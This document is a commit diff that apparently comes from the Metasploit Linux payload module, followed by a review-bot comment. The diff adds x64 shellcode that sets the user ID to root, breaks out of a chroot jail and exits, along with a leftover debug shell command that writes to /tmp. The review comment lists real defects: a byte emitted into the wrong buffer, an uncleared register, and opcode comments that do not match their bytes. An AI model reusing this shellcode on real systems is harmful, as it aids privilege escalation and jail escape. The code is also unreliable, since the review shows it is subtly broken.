`advance` linux x64 payloads
parent
4b814d7da2
commit
fe2caf2fe4
|
@ -124,6 +124,7 @@ module Msf::Payload::Linux
|
|||
# build ".." str (ptr in ebx)
|
||||
"\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
|
||||
"\x66\x68\x2e\x2e" +# pushw $0x2e2e #
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
# loop changing dir
|
||||
|
@ -137,6 +138,7 @@ module Msf::Payload::Linux
|
|||
"\x89\xd9" +# movl %ebx,%ecx #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
`echo "foo size: #{pre.size}" > /tmp/dupa`
|
||||
end
|
||||
|
||||
# Append
|
||||
|
@ -203,7 +205,98 @@ module Msf::Payload::Linux
|
|||
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
end
|
||||
|
||||
if (test_arch.include?(ARCH_X86_64))
|
||||
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x6a\x75" # push 0x75 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
end
|
||||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x6a\x71" # push 0x71 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x6a\x69" # push 0x69 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependChrootBreak'])
|
||||
|
||||
# setreuid(0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rax,rdi #
|
||||
pre << "\x48\x89\xf8" # mov rax,rdi #
|
||||
pre << "\xb0\x71" # mov al,0x71 #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
# generate temp dir name
|
||||
pre << "\x48\xbf" # mov rdi, #
|
||||
pre << Rex::Text.rand_text_alpha(8) # random #
|
||||
pre << "\x56" # push rsi #
|
||||
pre << "\x57" # push rdi #
|
||||
|
||||
# mkdir(random,0755)
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
pre << "\x66\xbe\xed\x01" # mov si,0755 #
|
||||
pre << "\x6a\x53" # push 0x53 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
# chroot(random)
|
||||
pre << "\x48\x31\xd2" # xor rdx,rdx #
|
||||
pre << "\xb2\xa1" # mov dl,0xa1 #
|
||||
pre << "\x48\x89\xd0" # mov rax,rdx #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
# build .. (ptr in rdi )
|
||||
pre << "\x66\xbe\x2e\x2e" # mov si,0x2e2e #
|
||||
pre << "\x56" # push rsi #
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
|
||||
# loop chdir(..) 69 times
|
||||
# syscall tendo to modify rcx can't use loop...
|
||||
pre << "\x6a\x69" # push 0x45 #
|
||||
pre << "\x5b" # pop rbx #
|
||||
pre << "\x6a\x50" # push 0x50 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
pre << "\xfe\xcb" # dec bl #
|
||||
pre << "\x75\xf7" # jnz -7 #
|
||||
|
||||
# chrot (.) (witch should by /)
|
||||
pre << "\x6a\x2e" # push . (0x2e) #
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
pre << "\x48\x89\xd0" # mov rax,rdx #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
end
|
||||
|
||||
# Append
|
||||
|
||||
# exit(0)
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x48\x31\xff" # xor rdi,rdi #
|
||||
app << "\x48\x89\xf8" # mov rax,rdi #
|
||||
pre << "\xb0\x3c" # mov al,0x69 #
|
||||
app << "\x0f\x05" # syscall #
|
||||
end
|
||||
end
|
||||
|
||||
return (pre + buf + app)
|
||||
|
|
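Review bot: The AppendExit block in the third hunk writes the exit syscall number into the wrong buffer — `pre << "\xb0\x3c" # mov al,0x69 #` should be `app << "\xb0\x3c" # mov al,0x3c #`; as written the appended stub reaches `syscall` with rax still 0 (read) because rax was copied from the zeroed rdi, and the stray `mov al,0x3c` is emitted in front of the payload instead, since the method returns `pre + buf + app`. The second hunk leaves a backtick-quoted debug line in the generator (the one echoing `foo size: #{pre.size}` into `/tmp/dupa`), which runs a shell command on the framework host every time this payload is built and should be deleted. In the x64 PrependSetresuid block only rdi and rsi are cleared before the 0x75 syscall, so the third argument (suid) is whatever rdx happened to hold; add `pre << "\x48\x31\xd2" # xor rdx,rdx #` before the syscall, as the chroot block already does. Several opcode comments disagree with their bytes and should be corrected: `\x48\x89\xfe` in the PrependChrootBreak setreuid stub is `mov rsi,rdi`, not `mov rax,rdi`; `\x6a\x69` pushes 0x69 (105 loop iterations), not 0x45 as the comment and the "69 times" note say; and `\x75\xf7` is a rel8 displacement of -9, not -7.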